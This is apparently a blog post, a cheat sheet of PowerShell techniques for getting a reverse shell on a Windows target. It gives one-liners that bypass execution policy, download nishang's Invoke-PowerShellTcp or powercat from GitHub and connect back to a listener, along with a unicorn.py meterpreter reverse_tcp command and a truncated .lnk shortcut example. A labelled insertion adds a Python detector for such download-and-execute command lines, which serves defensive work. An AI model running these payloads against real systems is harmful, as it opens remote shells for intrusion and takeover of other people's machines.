Get Shell By PowerShell
Invoke-PowerShellTcp.ps1
Listener: nc -nv -l -p 9999
Run on the target:
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress LISTENER_IP -Port LISTENER_PORT"
unicorn.py
python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443
powercat.ps1
Listener: nc -nv -l -p 9999
Run on the target:
powershell -nop -exec bypass -c "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c LISTENER_IP -p 9999 -e cmd.exe"
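The Invoke-PowerShellTcp and powercat one-liners share one launch pattern: -nop -exec bypass -c wrapped around IEX and DownloadString, which is visible in process-creation logs. The detector below is an added example, not part of the original post; the function names are hypothetical, and the sample command lines, the example.invalid URL and the 192.0.2.10 address are constructed.

```python
import re
# Constructed process-creation command lines (Sysmon Event 1 / Security 4688 style).
SAMPLE_EVENTS = [
    "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/a.ps1');Invoke-Thing\"",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -File C:\scripts\backup.ps1",
    "PowerShell.exe -NoP -EP Bypass -Command \"Invoke-Expression ((New-Object System.Net.WebClient).DownloadString('http://192.0.2.10/x'))\"",
    "cmd.exe /c echo IEX DownloadString(",
]

DOWNLOAD = re.compile(r"(?i)\.Download(String|Data|File)\s*\(")
EXECUTE = re.compile(r"(?i)\b(IEX|Invoke-Expression)\b")
URL = re.compile(r"(?i)https?://[^\s'\")]+")

def _abbrev(token, full, min_len, alias=None):
    """powershell.exe accepts abbreviated parameter names (-nop, -exec, -c, -ep)."""
    name = token.lstrip("-/").lower()
    if token[:1] not in ("-", "/") or not name:
        return False
    return name == alias or (len(name) >= min_len and full.startswith(name))

def analyse(cmdline):
    """Return (set of findings, URLs in the payload) for one command line."""
    tokens = cmdline.split()
    if not tokens or not re.search(r"(?i)\b(powershell|pwsh)(\.exe)?$", tokens[0].strip('"')):
        return set(), []
    hits, payload, i = set(), "", 1
    while i < len(tokens):
        t = tokens[i]
        if _abbrev(t, "noprofile", 3):
            hits.add("no-profile")
        elif _abbrev(t, "executionpolicy", 2, "ep") and i + 1 < len(tokens):
            if tokens[i + 1].strip("\"'").lower() in ("bypass", "unrestricted"):
                hits.add("policy-bypass")
            i += 1  # skip the policy value
        elif _abbrev(t, "encodedcommand", 1, "ec"):
            hits.add("encoded-command")
            break
        elif _abbrev(t, "command", 1):
            payload = " ".join(tokens[i + 1:])
            break  # stop: later -c/-e/-p belong to the script, not powershell.exe
        i += 1
    if DOWNLOAD.search(payload) and EXECUTE.search(payload):
        hits.add("download-cradle")
    return hits, URL.findall(payload)

if __name__ == "__main__":
    for line in SAMPLE_EVENTS:
        hits, urls = analyse(line)
        print("ALERT" if "download-cradle" in hits else "ok   ", sorted(hits), urls)
```

Flags alone (-NoProfile, -ExecutionPolicy Bypass) are common in legitimate automation, so the alert keys on the download-and-execute payload and reports the flags as context.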
Lnk Powershell
PowerShell script that generates a shortcut (.lnk) shell
$WshShell = New-Object -comObject WScript.Shell
- Post title:Get Shell By PowerShell
- Post author:ssooking
- Create time:2017-08-30 15:12:00
- Post link:https://ssooking.github.io/2017/08/get-shell-by-powershell/
- Copyright Notice:All articles in this blog are licensed under BY-NC-SA unless stating additionally.